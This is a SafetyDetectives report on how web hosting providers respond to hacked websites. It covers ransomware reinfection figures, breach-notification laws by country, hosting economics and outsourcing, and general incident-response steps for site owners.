Roberto Popolizio
Published on: August 13, 2025
No matter what you think (or your web host makes you think), no website is immune to breaches.
Shit happens and you must be ready with a remediation plan.
But what does REALLY happen when a website gets hacked?
Most often the answer is nothing. Many providers suspend your site, offer no forensics, and leave you scrambling to find (and pay) a third party to fix the mess.
This SafetyDetectives report investigates how web hosting providers approach website remediation, and compare their claims against hard data, expert insights, and real-world case studies.
A big thanks to Fabio Assenzio, CMO at Ergonet, for helping me with this massive study.
Ransomware Reinfection Rates
Many sources report that paying a ransomware demand does not guarantee safety. In fact, simply paying a ransom or restoring files without fully fixing the breach is very likely to lead to another compromise and another (usually higher) ransom.
- Cybereason found that about 80% of organizations that paid a ransom were hit again by ransomware soon after.
- In another study 67% of second attacks demanded an even higher ransom.
- Similarly, a Varonis blog cites a survey where “80 percent of victims who submitted a ransom payment experienced another attack soon after”.
Industry experts like CISA’s Eric Goldstein also emphasize that many ransomware incidents go unreported (perhaps only ~25% are ever disclosed), suggesting that the above figures may understate the true scale of the problem.
This reinfection rate shows that the underlying vulnerability causing a breach often doesn’t get fixed.
Web hosts accountability in different countries
Let’s see a breakdown of regulations in the US, Europe and other 1st world countries… You would expect them to be at the forefront when it comes to your right to know when shit happens, right?
Think again… In many jurisdictions, web hosting companies may not be legally required to notify customers or regulators of a breach.
In Europe, the hosting provider must immediately inform the site owner of a data breach. If there’s a risk to the people whose data was exposed, the website owner must notify the national privacy authority within 72 hours.
In the US there’s no single federal law covering all personal data breaches. There are only some sector-specific rules. Two examples:
- HIPAA, which covers personal health information, requires the host to notify its users “without unreasonable delay” in no more than 60 days.
- CIRCIA (Cyber Incident Reporting for Critical Infrastructure Act) will soon mandate critical infrastructure sectors to report “substantial” cyber incidents to CISA but not to affected individuals within 72 hours.
Canada, Australia, and Japan have national privacy laws that include breach notifications. Timelines vary and the host is often required to notify affected individuals “as soon as feasible” and regulators within a specified deadline.
Takeaway: Outside the EU, there’s no unified accountability rule like GDPR. Breach response depends on where you and your host are, what types of data are involved, and what is written in your contract with the hosting providers.
So what should you expect from your web host?
Reputable web hosting providers include breach clauses in their contracts, develop their own incident response plans, and have all the appropriate certifications (e.g., ISO 27001, SOC 2).
Many large providers do publish incident-response procedures or notify customers internally when their infrastructure is affected, but they stop there. If a hosted website is hijacked, the provider usually offers to suspend the account (to stop abuse) or shut down the site. They may also provide raw server logs, but rarely perform the cleanup themselves except as a paid add-on.
Outsourcing security is very common, especially song large shared‐hosting firms. A quick survey of hosting offerings shows that many providers prefer to resell or recommend products from security firms rather than train their own staff.
For example, GoDaddy outsources security entirely to SiteLock and forces customers to purchase it if they want any security at all.
This means that after a hack, you may have to hire a third-party cleanup service (e.g. Sucuri, SiteLock, CloudBrackets, etc.). Better than nothing, but can be costly and risky for the customer, since both the host and the contractor (of whom the website owner knows nothing about) need to get paid.
Unfortunately, the remaining majority of web hosting firms offer little or no hands-on help when websites are breached, and this creates a risky loop, since unmaintained sites often continue to distribute malware indefinitely.
But why? To answer this question, we must look at the economics of web hosting.
Economic Dynamics of Hosting Providers
Low profit margins, high infrastructure costs, and high support demands, leave little budget for cutting-edge security, or incident response.
New hosts often offer “crazy discounts”, but then “fail to profit out of it.
Then, a large portion of this revenue is spent on infrastructure: about 30% of gross revenue goes into servers and network, leaving only ~$0.70 on the dollar to cover everything else (staff, support, development).
Even at $120/year per customer, a host might afford only one system administrator for roughly 1,400 customers. In other words, small per-customer fees mean very little room for high-priced talent.
With such low margins, not much is left to invest in staffing and security training and tools. Most teams are in fact composed mainly of junior techs or outsourced overseas, with the result that support is 24/7 but the security expertise offered is limited to basic monitoring.
This explains why small web hosts outsource their remediation. Investing in full-scale incident response teams is feasible only for very large data centers or cloud operators.
So, given that many web hosts are not totally reliable when it comes to website remediation, what can we users do?
Here are some tips from our poll of cybersecurity experts.
Efficacy of Common Post-Breach Advice
Typical “quick fixes” after a website hack, like restoring a backup or running an antivirus scan, are necessary but not sufficient to prevent reinfection.
Similarly, running an antivirus or malware scanner without doing a full analysis may miss backdoors or rootkits.
What you need is a structured incident-response process for breaches. Key steps include:
- Detection and containment. Confirm the site is compromised, then put it into maintenance/offline mode to prevent further damage. Preserve logs.
- As CISA’s incident response playbook recommends, capture full memory and disk images of affected servers. Collect all logs (webserver logs, CMS logs, authentication logs). Analyzing these artifacts later will help identify attacker actions.
- Identify the root cause by examining logs and file changes. Common techniques include scanning for web shells, checking for newly created admin users or crontabs, and comparing file hashes against clean versions.
- Remove all malicious files and code. Because many hacks involve multiple payloads (as Figure 1 suggests), clean up all backdoors, spam scripts, rogue code, and any unauthorized accounts or services. Change all credentials.
- Rebuild or restore a site only after a thorough cleanup. Preferably, redeploy from clean sources (for example, using tested “golden images” or backups known to be clean). Ensure backups are offline and untampered.
- Identify the vulnerability that enabled the breach and fix it. Update all software (CMS core, plugins, OS). Apply any firewall or WAF rules needed.
- Document the incident steps and report to stakeholders. If laws require, notify affected users. Learn lessons and update security policies.
This report was made made in collaboration with Ergonet, one of the top Italian web hosting providers.
Their expertise was crucial for me to decode and understand the nuances behind this data. I could have never done this without their support.
Sources:
Key references include CISA guidelines, Sucuri’s 2023 threat report, ransomware surveys, and multiple cybersecurity experts’ analyses.
https://www.thedfirspot.com/post/investigating-a-compromised-web-server
https://www.hiscoxgroup.com/news/press-releases/2022/08-11-22
https://www.cisa.gov/sites/default/files/2024-08/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf
https://www.cybereason.com/press/cybereason-ransomware-true-cost-to-business-study-reveals-organizations-pay-multiple-ransom-demands
https://www.varonis.com/blog/ransomware-statistics
https://www.techmonitor.ai/technology/cybersecurity/record-breaking-ransomware-attempt-spike
https://websea.org/hosting-provider-legally-obliged-to-reveal-a-breach-of-security/
https://www.emsisoft.com/en/blog/25138/hacked-abandoned-webservers-the-invisible-helpers-for-malware-authors/
https://gdpr-info.eu/art-33-gdpr/
https://www.hugheshubbard.com/news/recent-developments-u-s-data-breach-reporting-obligations
https://www.sitelock.com/resources/case-studies/
https://www.cisa.gov/stopransomware/ransomware-guide
https://www.threatdown.com/blog/ransomware-reinfections-on-the-rise-from-improper-remediation/
https://www.thedfirspot.com/post/investigating-a-compromised-web-server
https://www.howthemarketworks.com/the-economics-of-web-hosting-explained/
https://www.milesweb.com/blog/hosting/why-people-quit-web-hosting-business/